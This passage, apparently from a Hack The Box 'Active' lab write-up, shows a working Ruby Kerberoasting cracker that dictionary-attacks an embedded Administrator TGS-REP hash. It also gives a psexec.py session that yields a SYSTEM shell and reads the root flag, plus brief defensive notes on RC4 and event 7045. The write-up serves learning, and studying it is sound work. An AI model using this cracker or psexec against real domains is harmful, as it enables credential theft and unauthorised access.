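    [h, 0x6ed9eba1, [3, 9, 11, 15], [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]]
  ]
  a, b, c, d = 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476
  (0...msg.bytesize).step(64) do |off|
    x = msg.byteslice(off, 64).unpack('V16')
    aa, bb, cc, dd = a, b, c, d
    rounds.each do |fn, k, shifts, order|
      order.each_with_index do |word, i|
        a = rotl32((a + fn.call(b, c, d) + x[word] + k) & MASK32, shifts[i % 4])
        a, b, c, d = d, a, b, c # rotate so the next step updates the next register
      end
    end
    a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
  end
  [a, b, c, d].pack('V4')
end

# NT hash = MD4 over the UTF-16LE password; for etype 23 it is the Kerberos key itself.
def nt_hash(password)
  md4(password.encode('UTF-16LE'))
end

def rc4(key, data)
  s = (0..255).to_a
  kb = key.bytes
  j = 0
  256.times do |i|
    j = (j + s[i] + kb[i % kb.size]) & 0xff
    s[i], s[j] = s[j], s[i]
  end
  i = j = 0
  data.bytes.map do |byte|
    i = (i + 1) & 0xff
    j = (j + s[i]) & 0xff
    s[i], s[j] = s[j], s[i]
    byte ^ s[(s[i] + s[j]) & 0xff]
  end.pack('C*')
end

def hmac_md5(key, data)
  OpenSSL::HMAC.digest('MD5', key, data)
end

# Split a hashcat -m 13100 line: $krb5tgs$<etype>$*<user>$<realm>$<spn>*$<checksum>$<edata>
def parse_krb5tgs(line)
  m = line.strip.match(/\A\$krb5tgs\$(\d+)\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$([0-9a-f]{32})\$([0-9a-f]+)\z/i)
  raise ArgumentError, 'not a $krb5tgs$ line' unless m
  { etype: m[1].to_i, user: m[2], realm: m[3], spn: m[4],
    checksum: [m[5]].pack('H*'), edata: [m[6]].pack('H*') }
end

# RFC 4757 (RC4-HMAC) with key usage 2, the TGS-REP ticket enc-part:
#   K1 = HMAC-MD5(NT, usage as 4-byte LE)   K3 = HMAC-MD5(K1, checksum)
#   plaintext = RC4(K3, edata)              valid iff HMAC-MD5(K1, plaintext) == checksum
def kerberoast_check(ticket, password)
  raise ArgumentError, 'only etype 23 (RC4-HMAC) is handled here' unless ticket[:etype] == 23
  k1 = hmac_md5(nt_hash(password), [2].pack('V'))
  k3 = hmac_md5(k1, ticket[:checksum])
  plaintext = rc4(k3, ticket[:edata])
  hmac_md5(k1, plaintext) == ticket[:checksum]
end

# Dictionary attack: the first candidate that validates, or nil.
def kerberoast_crack(line, candidates)
  ticket = parse_krb5tgs(line)
  candidates.find { |pw| kerberoast_check(ticket, pw) }
end

# The TGS-REP GetUserSPNs.py wrote to SPN2hashcat above (copied from this page).
ACTIVE_TICKET = '$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$66be5612a75e8b848bee009cc6f1cd3d$0704e0568964fb5f33d76802ac1365a34bc12a1b6db6df1aa5c534a4a23fd377c00790dd615acc790bb1e43498d256cc5b85fb9b2dc500c96a268858ca14599f3750356054bcce04e04e50ef3d4f2b4dd43d18b868ad4db1865e3088c30ebd7079e8356fb74cf02c8635c143c13b640bd9cf641c858444ab2448351e1bbd52fa7352010a2d362b4d7a8d4f5fe35aab9ae2ca69057edad31eb350493f2ecfc359e16406c885ffde8b9252eb8a19e02c4b453e23534b23ba62776516cab94efb3e690d5761af91c756bab200330057347a33c99a55d4522dd80d72be52d805749f11a6b10c10be450087fbc3eab2efef26e4d21eff2c0a338589e090900d5ff5d0fef4bb07a2fc11387e056a36da505e9093d65f14d24b8fa711eb8a24307b3f6111844678c1a37394a2710f4feaf0e60506ee4b94314e209b1ddd62e52bd1bb16e758d0cc0a06f03c3decc79e5db686085987ac8c04e8e8a8e6e80e50ad67023c4495d185d6b0555a9921b6217d52e2a822a5ec9243d56667f0d02a826d1101b0ee8f6e3e43ef9f1776e846dc5265f150fff46c643540b8e2eed66c70c3af8ed8c3d44c82c0c70ce569b3bd584ca41920cce2285055134baec2fe3e368834baa83dbf3c550ed918581fd73920efc22b2a3f454ecf7446adf0fd0ae0c970149ee75c98b453ee666989716b4e876bce3ee998c3d215cf0df3350ab92536e8a4f153e72e46ab01a76159e46f2d68c5a836ffde9e24f8b58bb72f84acc13f6fc745f6247e3ed2200b99752da6eeead1b5c30a4cdd1448fd6ca8b41f9bc68b150a2118df7080ba6739f7c68b33e73b17fbd9d0797bfe2f0dcc083cf011f248a22d04f4359376eb1effa89f052be0841ca69022a09d07381856953fa6717c7187b0a302d1b3c582000dbac6c91c83759fb812c66e7d7ffb35552b3b9015b5c9de93bfb33867792a54616a9aed330dfefe79cf3ceeca5df6d46ca2e8c6adf3e6165e922f6c8adb76e3231fba3e00294d72de9041ae048b97364b68d601210a76703e23fbbb972ca952feb34ea1f25b30ba412896d35131effb417dd37184e0f5523a62668c060c9fa57020ca8774be4f624841307bfa76185fd9327f22cf914cd4df65c85f2e941e90dc798ce2626d82e901abfe7ea85b868600ee91be0fd241dfbf942f3e0dc34a0a3485feccf2ff13e788414a7d665d0568fcc67a08836e0e06bdb62f925269d32d3d0ef509790bdf11b38065b97052b108128b646388'

if __FILE__ == $PROGRAM_NAME
  p kerberoast_crack(ACTIVE_TICKET, %w[password Welcome1 Ticketmaster1968])
end
```

Every candidate costs one MD4, three HMAC-MD5s and one RC4 pass over the ticket, all unkeyed by any secret the attacker lacks, which is what makes hashcat's rate on a laptop CPU sufficient against rockyou.txt. AES etypes (17/18) replace the NT hash with a PBKDF2-derived key and are far slower to test, which is one reason to remove RC4 from service accounts.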

Root flag

We get a shell with impacket's psexec.py. It uploads a service binary to ADMIN$ and registers and starts it through the Service Control Manager, so it is noisy: the service installation is recorded in the System log (event 7045). Fine for a lab, not for a quiet engagement.

root@kali:~/HTB/Machines/Active# ../../Utils/impacket/examples/psexec.py Administrator@active.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Requesting shares on active.htb.....
[*] Found writable share ADMIN$
[*] Uploading file TkGvHmKO.exe
[*] Opening SVCManager on active.htb.....
[*] Creating service Lecg on active.htb.....
[*] Starting service Lecg.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
<ROOT_FLAG>

C:\Users\Administrator\Desktop>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on active.htb.....
[*] Stopping service Lecg.....
[*] Removing service Lecg.....
[*] Removing file TkGvHmKO.exe.....

Daniel Simao 11:43, 5 January 2020 (EST)